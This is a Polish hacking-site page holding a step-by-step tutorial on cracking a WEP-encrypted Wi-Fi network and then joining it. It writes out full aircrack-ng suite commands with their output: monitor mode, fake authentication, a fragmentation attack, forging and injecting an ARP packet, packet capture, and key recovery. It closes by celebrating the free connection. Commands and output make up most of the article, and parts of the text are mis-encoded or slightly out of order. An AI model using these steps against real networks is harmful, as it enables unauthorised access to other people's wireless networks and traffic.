Menu
Strona gŇā√≥wna
Hacking
Programowanie
Telefonia Komórkowa
Kody do Gier
Linux
Dlaczego?
Programowanie w Delphi
Mapa strony
 Programy
Systemy
ArtykuŇāy PDF

Security

Skanery
Sniffery
Security

Windows

UŇľytkowe
Przegl¬Īdarki graficzne
Kodeki
Narzńôdzia plikowe
Narzńôdzia dyskowe
Narzńôdzia systemowe
Sterowniki
Szyfrowanie danych
Zarz¬Īdzanie hasŇāami
Zarz¬Īdzanie rejestrem
£aty i Patche
Zarz¬Īdzanie pamińôci¬Ī
Synchronizacja czasu
Nagrywanie pŇāyt
Free Antivirus (Darmowe Antyvirusy)
Sterowniki
Obr√≥bka d¬ľwińôku
Edycja wideo

Internetowe

Bezpiecze√Īstwo
Programy P2P
Komunikatory
Dodatki do przegl¬Īdarek
Klienty poczty elektronicznej
Narzńôdzia Antyspamowe
Przegl¬Īdarki grup dyskusyjnych
Przegl¬Īdarki Offline
Serwery poczty elektronicznej
Telefonia komórkowa
Wyszukiwarki internetowe
Zdalny dostńôp
Cybernianie
Klienty FTP
Narzńôdzia internetowe
PrywatnoŇõc
Przegl¬Īdarki internetowe
Serwery FTP
Serwery WWW
Wspomagacze Ňõci¬Īgania
Zarz¬Īdzanie sieci¬Ī lokaln¬Ī

Tuning Systemu

Diagnostyka i testowanie
Inne
Rozszerzenia pulpitu
Tapety na pulpit
Tuning Systemu
Ikony
PowŇāoki
Tuning sprzńôtu
Wygaszacze ekranu

Programowanie

Kompilatory
Biblioteki i komponenty
Bazy danych
Edytory programistyczne
¦rodowiska programistyczne
Debugery
Tworzenie wersji instalacyjnych

Webmastering

UŇľytkowe
Kursy

Linux

UŇľytkowe
Internetowe
Multimedialne

Programy biurowe

Programy dla firm
Pakiety biurowe
Administracja
Edytory tekstu
Grafika prezentacyjna
Kadry i pŇāace
Wspomaganie projektowania
Zarz¬Īdzanie projektami
Bazy danych
Finanse i ksińôgowoŇõc
Handel
Programy ewidencyjne
Zarz¬Īdzanie informacj¬Ī osobist¬Ī (PIM)
 Download GRY
Pelne Wersje GIER
 Artyku≥y > Kody do Gier > Ataki na sieci WiFi nr 1.

1. Zbieranie informacji potrzebnych do ataku.
2. Przygotowywanie karty w tryb monitor i odpowiedni kanal.
3. Przeprowadzamy atak Fake Authentication.
4. Przeprowadzamy atak Fragmentation.
5. Tworzymy pakiet ARP.
6. Uruchamiamy airodump-ng
7. Injectujemy pakiet ARP.
8. Uruchamiamy aircrack-ng lub aircrack-ptw.
9. Laczymy sie z siecia



1. Zbieranie informacji potrzebnych do ataku.

Najbardziej fajnym sposobem ktorym znam jest uzycie iwlist. Ten program pokaze nam kanal, adres MAC
Access Point'a, tryb, kanal, czy wlaczone jest szyfrowanie oraz jakosc sygnalu. W tym celu wpisujemy
nastepujace polecenia:

Kod:

ifconfig ra0 up



Kod:

iwlist ra0 scan


Naszym oczom ukazuje sie:

Kod:

ra0       Scan completed :

Cell 01 - Address: 00:14:BF:E1:D3:DD
                   ESSID:"test"
                   Mode:Managed
                   Channel:11
                   Encryption key:on
                   Quality:0/100  Signal level:-27 dBm  Noise level:-256 dBm



Teraz wiemy wystaczajaco duzo aby przystapic do punku 2.


2. Przygotowywanie karty w tryb monitor i odpowiedni kanal.

Do trybu monitor mamy do wyboru uzyc airmon-ng lub iwconfig. Ja osobicie uzywam iwconfig lecz oba daja
nam ten sam efekt. W przypadku airmong-ng bedzie to:

Kod:

airmon-ng start ra0 11


Gdzie: start znaczy uruchom tryb monitor dla karty o interfejsie ra0 na kanale 11. System odpowie:

Kod:

Interface       Chipset         Driver
ra0             Ralink          rt61 (monitor mode enabled)


W przypadku iwconfig bedzie to:

Kod:

iwconfig ra0 mode Monitor channel 11


Gdzie ra0 to interfejs mode to tryb Monitor na kanale 11-tym.

3. Przeprowadzamy atak Fake Authentication.

Aby Access Point zaakceptowal pakiet ARP zrodlowy MAC musi byc polaczony z AP. W innym razie AP nie
bedzie odpowiadal. W tym celu wpisujemy nastepujace polecenie:

Kod:

aireplay-ng -1 0 -e test -a 00:14:BF:E1:D3:DD -h 00:17:9A:B2:31:AA ra0

Jesli system
odpowie:

Kod:

13:57:55  Sending Authentication Request
13:37:55  Authentication successful
13:37:55  Sending Association Request
13:37:55  Association successful :-)


Bingo! oto wlasnie chodzilo. Jesli otrzymalismy taki wynik przechodzimy do punku 4-go. Jesli dostajemy taka odpowiedz:

Kod:

13:59:50  Sending Authentication Request
13:59:52  Sending Authentication Request
13:59:54  Sending Authentication Request
13:59:56  Sending Authentication Request
13:59:58  Sending Authentication Request
14:00:00  Sending Authentication Request
14:00:02  Sending Authentication Request

Attack was unsuccessful. Possible reasons:

   * Perhaps MAC address filtering is enabled.
   * Check that the BSSID (-a option) is correct.
   * Try to change the number of packets (-o option).
   * The driver hasn't been patched for injection.
   * This attack sometimes fails against some APs.
   * The card is not on the same channel as the AP.
   * Injection is not supported AT ALL on HermesI,
     Centrino, ndiswrapper and a few others chipsets.
   * You're too far from the AP. Get closer, or lower
     the transmit rate (iwconfig <iface> rate 1M).


Jest to nieudany atak. Upewnij sie ze atak jest wystarczajaco mocny i zmien rate trasmitowania karty poleceniem:

Kod:

iwconfig ra0 rate 1M


I wykonaj atak ponownie.

4. Przeprowadzamy atak Fragmentation.

Abysmy mogli przystapic do tego ataku atak nr. 3 MUSI sie udac. Atak Fragmentation nie tworzy nam pakietu ARP lecz uzywamy ten atak aby w nastepnym ataku bylo to mozliwe. Wklepujemy nastepujace polecenie:

Kod:

aireplay-ng -5 -b 00:14:BF:E1:D3:DD -h 00:17:9A:B2:31:AA ra0


Gdzie opcja -5 to fragmentation attack, -b to mac Access Point'a, -h to nasz adres MAC, ra0 to interfejs karty. Po kilku sekundach system odpowie:

Kod:

Waiting for a data packet...
Read 337 packets...

       Size: 344, FromDS: 1, ToDS: 0 (WEP)

            BSSID  =  00:14:BF:E1:D3:DD
        Dest. MAC  =  01:00:5E:7F:FF:FA
       Source MAC  =  00:14:BF:E1:D3:DB

       0x0000:  0862 0000 0100 5e7f fffa 0014 bfe1 d3dd  .b....^........
       0x0010:  0014 bfe1 d3db 5044 058b 9500 4b85 b8e6  ......PD....K...
       0x0020:  366d 66c7 3480 33a3 bccc 84ea 59a5 9ceb  6mf.4.3.....Y...
       0x0030:  70f0 f095 4834 0821 18a8 d626 3038 6955  p...H4.!...&08iU
       0x0040:  28fb 6fc6 d1ba 69bb aaf0 bc4d 5fda 8e48  (.o...i....M_..H
       0x0050:  58c4 ab90 01f0 4bd8 d7b3 6ea2 495b 5b36  X.....K...n.I[[6
       0x0060:  6f45 dab2 f9b4 4831 8e00 98b8 365e afd7  oE....H1....6^..
       0x0070:  1284 fa9e 5740 3750 6662 c9d9 d9d7 a8d1  ....W@7Pfb......
       0x0080:  0789 8d50 6473 566f 9a8f eeb6 7161 581e  ...PdsVo....qaX.
       0x0090:  1136 306b 5c02 b838 b119 3c48 9c8c 0fa6  .60k\..8..<H....
       0x00a0:  7fb0 9724 f1f7 94e1 63a6 3447 29a5 1f07  ..$....c.4G)...
       0x00b0:  6f36 fdf1 e860 2459 3bdb 3748 4396 e8ab  o6...`$Y;.7HC...
       0x00c0:  673c cd84 2b64 2233 2bbf 47df 3d1b b863  g<..+d"3+.G.=..c
       0x00d0:  564c efd2 0e8e 97bf c68b d461 1c14 a288  VL.........a....
       --- CUT ---

Use this packet ?


Stanowczo odpowiadamy Y. Nastepnie system nam odpowie:

Kod:

Saving chosen packet in replay_src-0427-141120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0427-141145.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream


Yeah! Przechodzimy do nastepnego punku.

5. Tworzymy pakiet ARP.

Bez zbednego bla bla bla wpisujemy polecenie:

Kod:

packetforge-ng -0 -a 00:14:BF:E1:D3:DD -h 00:17:9A:B2:31:AA -k 255.255.255.255 -l 255.255.255.255 -y fragment-0427-141145.xor -w sexowny-pakiet-arp


Gdzie -0 mowimy programowi ze chcemy pakiet ARP, -a to MAC Access Point'a, -h to nasz adres MAC, -l to zrodlo, -k to cel, -y to plik ktory zostal wygenerowany w poprzednim ataku, -w to nazwa pliku w ktory program ma zapisac nasz pakiet ARP. Z doswiadczenia wiem ze te ustawiania dzialaja zawsze. System odpowie:

Kod:

Wrote packet to: sexowny-pakiet-arp

Brawo, wlasnie stworzylismy pakiet ARP i przestepujemy do nastepnego punktu.

6. Uruchamiamy airodump-ng

Uruchamiamy konsole i wpisujemy nastepujace polecenie:
airodump-ng -w tocrack -c 11 --bssid 00:14:BF:E1:D3:DD ra0
Kod:

aireplay-ng -2 -r sexowny-pakiet-arp -x 666 ra0


Gdzie -2 to injectowanie indywidualnie wybranego pakietu -r sexowny-pakiet-arp to nazwa nasz pakiet ARP, -x 666 to ilosc pakietow ktore zostana wyslane (w sekundach). System odpowie:

Kod:

Size: 68, FromDS: 0, ToDS: 1 (WEP)

            BSSID  =  00:14:BF:E1:D3:DD
        Dest. MAC  =  FF:FF:FF:FF:FF:FF
       Source MAC  =  00:17:9A:B2:31:AA

       0x0000:  0841 0201 0014 bfe1 d3dd 0017 9ab2 31aa  .A............1.
       0x0010:  ffff ffff ffff 8001 128b 9500 0d51 313f  .............Q1?
       0x0020:  bc5f fa9c d755 50ab 5246 1e83 9172 f4b1  ._...UP.RF...r..
       0x0030:  3522 dd56 6e5f 90a9 9275 fe6c 5d84 dcea  5".Vn_...u.l]...
       0x0040:  402e e7fa                                @...

Use this packet ?



Jak widac wielkosc naszego pakietu to 68 bitow jest to tradycyjna wielkosc pakietu ARP, BSSID to adres MAC Acess Point'a, Dest. MAC to adres docelowy jak widac jest to adres MAC broadcast'u (255.255.255.255), Source MAC to zrodlo czyli my ;).
Stanowczo odpowiadamy Y nastepnie program zacznie wysylac pakiet a airodump-ng "zlapie" odpowiedzi ktore wysle nam Acess Point. Przechodzimy do nastepnego punktu.

8. Uruchamiamy aircrack-ng lub aircrack-ptw.

W dawnej wersji WEP klucze mialy 64 bity dzis WEP2 ma 128 a tak naprawde jest to 104 bity. Program aircrack-ptw jest nowoscia musimy go samodzielnie zainstalowac samodzielnie. Mozemy go pobrac ze strony [ www ] Przystepujemy do instalacji. Pierw musimy go rozpakowac poleceniem:

Kod:

tar -zxvf aircrack-ptw-1.0.0.tar.gz


Nastepnie:
[Code2]cd aircrack-ptw-1.0.0 && make
Kod:

emerge aircrack-ptw


Dla tych co uzywaja aircrack-ng musza zaczekac znacznie wiecej aby zlamac klucz dla tych co uzywaja aircrack-ptw caly proces w bardzo krotszy. Pierw opisze uzycie programu aircrack-ptw:

Kod:

aircrack-ptw tocrack-01.cap


Kod:


Gdzie tocrack-01.cap to jest nazwa pliku ktora stworzyl nam program airodump-ng. Jesli mamy wystarczajaco pakietow program zlamie klucz odpowiadajac:


Kod:

This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:14:BF:E1:D3:DD  keyindex=0
stats for bssid 00:14:BF:E1:D3:DD  keyindex=0 packets=115771
Found key with len 13: 35 80 8D 60 FA 9D 08 7D F7 65 DA 1D 70


Bingo, zlamalismy klucz. Dla tych co uzywaja aircrack-ng musza zebrac 250.000 pakietow IV aby zlamac 64 bitowy klucz oraz milion czasami wiecej aby zlamac 128 bitowy klucz. W tym celu wpisujemy:

Kod:

aircrack-ng -0 tocrack-01.cap


Dzieki opcji -X bedziemy mieli kolorki jak w matrixie, tocrack-01.cap to nazwa pliku z pakietami. Jesli wszystko pujdzie OK program zlamie klucz i wyswietli go nam na ekranie krzyczac:

Kod:

KEY FOUND! [ 35 80 8D 60 FA 9D 08 7D F7 65 DA 1D ]


Jesli wydobycie klucza sie nie zakonczy jakbysmy tego chcieli mozemy dodac parametrk -f x. Gdzie x jest liczba:

Kod:

aircrack-ng -X -f 15 tocrack-01.cap


Z doswiadczenia wiem ze 15 jest najlepszym wyjsciem. Ale nie jest to regula. Nastepnie...

9. Laczymy sie z siecia

Po zlamaniu klucza kazdy bedzie chcial polaczyc sie z siecia. Aby to zrobic musimy:
Wylaczyc karte:

Kod:

ifconfig ra0 down


Nastepnie ustawic nazwe sieci, ustawic tryb, podac klucz oraz kanal poleceniem:

Kod:

iwconfig ra0 mode Managed key 35 80 8D 60 FA 9D 08 7D F7 65 DA 1D essid test channel 11


Teraz mozemy uzyc dhcpcd lub pump. Dla dhcpcd bedzie to:

Kod:

dhcpcd ra0


Kod:


Dla pump bedzie to:


Kod:

pump -i ra0


Chyba nie musze tlumaczyc co jest do czego. Jesli system nie odpowie nam zadnym komunikatem bledu znaczy ze wszystko jest OK i mozemy przetestowac polaczenie:

Kod:

ping -c 3 www.google.com


System odpowie:

Kod:

PING www.l.google.com (64.233.183.147) 56(84) bytes of data.
64 bytes from nf-in-f147.google.com (64.233.183.147): icmp_seq=1 ttl=241 time=39.1 ms
64 bytes from nf-in-f147.google.com (64.233.183.147): icmp_seq=2 ttl=241 time=38.3 ms
64 bytes from nf-in-f147.google.com (64.233.183.147): icmp_seq=3 ttl=241 time=39.0 ms

--- www.l.google.com ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2001ms
rtt min/avg/max/mdev = 38.391/38.840/39.104/0.357 ms


Wszyscy wiemy ze wszystko poszlo jak trzeba czyli mamy polaczenie z Inernetem :D

komentarz[3] |

Copyright © 2006 - 2007 E-comet.info. Wszelkie prawa zastrzeŅone.

programy,artyku≥y,gry online,teledyski,filmiki,smieszne reklamy,sterowniki,kodeki,programy,program,download, downloads,security,bramka sms, teledyski,antywirusy,darmowe free program,programy p2p,tapety,programy biurowe,programy dla firm,narzÍdzia dyskowe,edytory,gry strategiczne,gry przygodowe,gry sportowe, symulatory, gry rpg,gry karciane, gry zrecznosciowe. Zapraszamy.
0.019 |